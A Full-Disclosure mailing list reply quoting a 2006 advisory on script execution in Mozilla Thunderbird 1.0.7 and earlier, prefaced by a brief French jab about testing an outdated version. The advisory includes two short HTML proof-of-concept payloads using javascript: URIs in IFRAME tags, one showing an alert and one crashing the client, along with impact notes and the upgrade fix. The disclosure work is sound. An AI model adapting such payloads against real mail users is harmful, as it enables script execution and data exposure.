-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 tu dois vraiment avoir rien à faire pour chercher des bugs dans une version perimée , loul :->
Renaud Lifchitz wrote: > Mozilla Thunderbird : Remote Code Execution & Denial of Service > > //----- Advisory > > > Program : Mozilla Thunderbird Homepage : > http://www.mozilla.com/thunderbird/ Tested version : <= 1.0.7 > Found by : nono2357 at sysdream dot com This advisory : > nono2357 at sysdream dot com Discovery date : 2006/01/28 > > > //----- Application description > > > Full-Featured Email > > Simple to use, powerful, and customizable, Thunderbird is a > full-featured email application. Thunderbird supports IMAP and POP > mail protocols, as well as HTML mail formatting. Easily import your > existing email accounts and messages. Built-in RSS capabilities, > powerful quick search, spell check as you type, global inbox, > deleting attachments and advanced message filtering round out > Thunderbird's modern feature set. > > > //----- Description of vulnerability > > > Thunderbird's WYSIWYG rendering engine insufficiently filters > javascript scripts. It is possible to write javascript in the SRC > attribute of the IFRAME tag. This leads to execution when the email > is edited (for instance when replying to the email), even if > javascript is disabled in the preferences. > > > //----- Proof Of Concept > > > * Javascript execution : > > <html> <body> <iframe src="javascript:alert('Found by > www.sysdream.com !')"></iframe> </body> </html> > > * Denial of service (application crash) : > > <html> <body> <iframe src="javascript:parent.document.write('Found > by www.sysdream.com !')"></iframe> </body> </html> > > > //----- Solution > > > Upgrade to version 1.5. > > Download page : http://www.mozilla.com/thunderbird/all.html Direct > link : > http://ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/1.5/ > > > //----- Impact > > > Successful exploitation may lead to information disclosure > (application version, platform, user emails, user preferences, ...) > or could crash the application. > > > //----- Credits > > > http://www.sysdream.com nono2357 at sysdream dot com > > > //----- Greetings > > > crashfr & the hackademy ... > > > > _______________________________________________ Full-Disclosure - > We believe in it. Charter: > http://lists.grok.org.uk/full-disclosure-charter.html Hosted and > sponsored by Secunia - http://secunia.com/ > > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ/zYha+LRXunxpxfAQLVJw/9ElEn3ACHtmNK07X5dQLWaV7Sj1bSg9TF i6eyhrvjFoqHRDFL+ZKPGS6Z9xSRV6SQ8fMruOwBHXaagcxyBFmPbtWA6OzUfYI3 sJKYWZiH0pEvdH9l5H5ZkxBrSZQ8mI+nKjR0D1thPSHPu0sNR5Oj+b4438SPoUif 0ZLN1UyxEIIPUS8pS42Bv2k6JKHl8cZ8q5D4k49u0gVP+Y0Gdz9D5w3mEDYbgSFC ROtIPuL9ARLN0MUeHYGIMhOfZefz5qP0GweNZDuK8dcJ9pyCc5gIvGeAK+Sa0cJ/ AY23GNwJQvcV3SRGfDaXergznAU5lg8NXq27z7wUzj/hmj11SS9rABLnKDFGZRj5 draGKg433VOCKJYwG7xH2xRkPrZOh4gbwn2/GLVU82702AsBsiWP5IRlGJ9K4uY0 A7pTgfBMGAgwcoouIqTxgrZd0pQPxgJ28TYg1DgdfACMp6wmU+8iWTKkivXcJIaT Qu33F+wZwS9jEE7ID3D14QCqlPfNg1drVpY3m/G6M08bCnxe1hyEOAIG141HIJUN gycXz4pNIP9gS6GhhG0epZKkIstYRjDOwwMFmu1MaR/O6u/wwX/gzED6S3LooVi1 OVmbpbwy3+Hv+mxcftomQcXUwv1lDMWlz2vjWDwdx9dpLlTvZI15CVk/jabUIEjL Tjzxv9mQu5w= =jhOg -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
